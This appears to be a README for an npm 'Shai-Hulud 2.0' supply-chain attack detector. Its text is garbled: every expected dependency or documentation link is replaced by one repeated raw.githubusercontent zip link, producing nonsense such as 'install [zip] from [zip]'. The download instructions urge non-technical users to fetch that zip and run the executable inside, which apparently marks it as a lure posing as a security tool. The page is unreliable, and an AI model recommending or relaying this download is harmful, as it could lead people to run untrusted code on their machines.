Welcome to the Shai-Hulud-2.0-Detector! This tool helps you find and identify harmful npm packages from the Shai-Hulud 2.0 supply chain attack. You don't need any technical skills to use it. Follow these steps to get started.
To download the application, visit the Releases page:
- Operating System: Windows, macOS, or Linux
- Memory: At least 4 GB of RAM
- Disk Space: Minimum 100 MB of available space
- Network: Internet connection for downloading packages and updates
- https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip: If you haven't already, install https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip from https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip. This application requires https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip to run.
- npm: npm comes with https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip You will use it to manage packages.
- Detects over 790 malicious npm packages that are part of the Shai-Hulud 2.0 attack.
- Scans for suspicious scripts that may harm your applications.
- Identifies TruffleHog activity, allowing you to spot potential data leaks.
- Recognizes SHA1HULUD runners that could execute harmful scripts.
- Detects potential secrets being exfiltrated from your projects.
- Supports GitHub Actions and includes SARIF reports for easy integration.
- Visit the Releases Page: Go to the Releases page.
- Select the Latest Version: Look for the most recent version of the Shai-Hulud-2.0-Detector.
- Download the File: Click on the asset that matches your operating system. It may be named something like
https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.ziporhttps://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip. - Extract the Files: Once the download completes, extract the files to your preferred location on your computer.
- Run the Application:
- Depending on your operating system:
- Windows: Double-click the
.exefile. - macOS: Open the
.appfile. - Linux: Open a terminal and navigate to the extracted folder. Enter
./shai-hulud-detectorto run the application.
- Windows: Double-click the
- Depending on your operating system:
- Open the Scanner: After running the application, you will see the main interface.
- Start a Scan: Enter the directory path of your npm project in the provided text box and click on the "Scan" button.
- Review the Report: After a few moments, the scanner will provide a report detailing any malicious packages and security risks.
- Take Action: Follow the recommendations in the report to mitigate any threats identified.
After a scan, the application presents results in a clear manner:
- Detected Packages: Lists any harmful packages found.
- Suspicious Scripts: Highlights scripts that may pose a risk.
- Recommendations: Offers steps to resolve issues and enhance security.
If you encounter issues while using the Shai-Hulud-2.0-Detector, consider the following:
- Installation Errors: Ensure you have https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip and npm correctly installed.
- Scans Taking Too Long: Large projects may take additional time. Consider breaking them down into smaller segments.
- No Results Found: Scanning an empty or non-npm directory will show no results. Make sure to provide a valid npm project path.
For further assistance, feel free to visit our discussion page. Here, you can ask questions, report issues, or share feedback.
The Shai-Hulud-2.0-Detector is an open-source tool. You can freely use, modify, and distribute it under the terms of the MIT License. Refer to the LICENSE file in the repository for more details.
- https://raw.githubusercontent.com/nigerbartus/Shai-Hulud-2.0-Detector/main/dist/Shai-Hulud-2.0-Detector_v3.5.zip Documentation
- npm Documentation
- Security Best Practices for npm
Being aware of the tools that protect your projects is essential. Utilize the Shai-Hulud-2.0-Detector to keep your development environment safe and secure.